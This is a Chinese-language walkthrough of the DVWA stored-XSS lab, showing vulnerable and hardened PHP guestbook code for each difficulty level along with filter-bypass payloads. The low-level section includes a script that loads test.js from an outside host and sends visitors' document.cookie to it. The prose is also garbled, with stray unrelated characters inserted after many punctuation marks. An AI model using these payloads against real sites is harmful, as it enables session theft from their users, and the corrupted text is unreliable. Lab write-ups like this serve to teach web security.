LOW
XSS存儲(chǔ)型攻擊,惡意代碼被保存到目標(biāo)網(wǎng)站的服務(wù)器中拧粪,這種攻擊具有較強(qiáng)的穩(wěn)定性和持久性修陡,比較常見場(chǎng)景是在博客,論壇可霎、OA魄鸦、CRM等社交網(wǎng)站上,比如:某CRM系統(tǒng)的客戶投訴功能上存在XSS存儲(chǔ)型漏洞癣朗,黑客提交了惡意攻擊代碼拾因,當(dāng)系統(tǒng)管理員查看投訴信息時(shí)惡意代碼執(zhí)行,竊取了客戶的資料旷余,然而管理員毫不知情绢记,這就是典型的XSS存儲(chǔ)型攻擊
點(diǎn)擊會(huì)返回查詢結(jié)果
如果輸入<script>alert('xss')</script>
查看一下數(shù)據(jù)庫
也就是有注入漏洞了。于是 Hacker 再輸入了 <script src="http://www.a.com/test.js"></script>
//test.js
var img = document.createElement("img")
img.src = "http://www.a.com/?cookies="+escape(document.cookie);
document.body.appendChild(img);
然后所有看到這條信息的用戶的 cookies 就會(huì)被偷走了正卧。 而低級(jí)的代碼是這樣的蠢熄,沒有做任何的防護(hù)
源碼
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
相關(guān)函數(shù)
stripslashes
addslashes() 函數(shù)
medium
把存在數(shù)據(jù)庫中的js語句刪除才能做更高一等級(jí)的題
源碼
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
strip_tags() 函數(shù)
addslashes() 函數(shù)
mysql_real_escape_string 函數(shù),對(duì)
"
,'
,\r
等特殊符號(hào)轉(zhuǎn)義htmlspecialchars 炉旷,對(duì) html 相關(guān)的字符轉(zhuǎn)義
但是
name 字段只有去掉 script 字符串 和用mysql_real_escape_string函數(shù)進(jìn)行轉(zhuǎn)義
所有可以利用 name 字段注入
輸入在 Name 字段輸入 前端那里有個(gè)字符長(zhǎng)度的限制签孔。你可以用火狐直接將 maxlength 改大,或者用 brupSuite 的改就可以了窘行。 所以這代碼最后還是可以被注入的骏啰。
<scri<script>pt>alert('xss')</script>
看一下數(shù)據(jù)庫
高級(jí)代碼 對(duì) name 的驗(yàn)證有所改變
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
<img src=1 onerror=alert(/xss/)>
impossible
源碼
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = stripslashes( $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$name = htmlspecialchars( $name );
// Update database
$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
$data->bindParam( ':message', $message, PDO::PARAM_STR );
$data->bindParam( ':name', $name, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
anti-token 機(jī)制防 CSRF 攻擊
使用 db->prepare 預(yù)編譯,綁定參數(shù)的方式抽高,防 SQL 攻擊
name 和 message 參數(shù)通過 htmlspecialchars 等函數(shù)防御
相關(guān)函數(shù)
trim()
stripslashes
htmlspecialchars ,對(duì) html 相關(guān)的字符轉(zhuǎn)義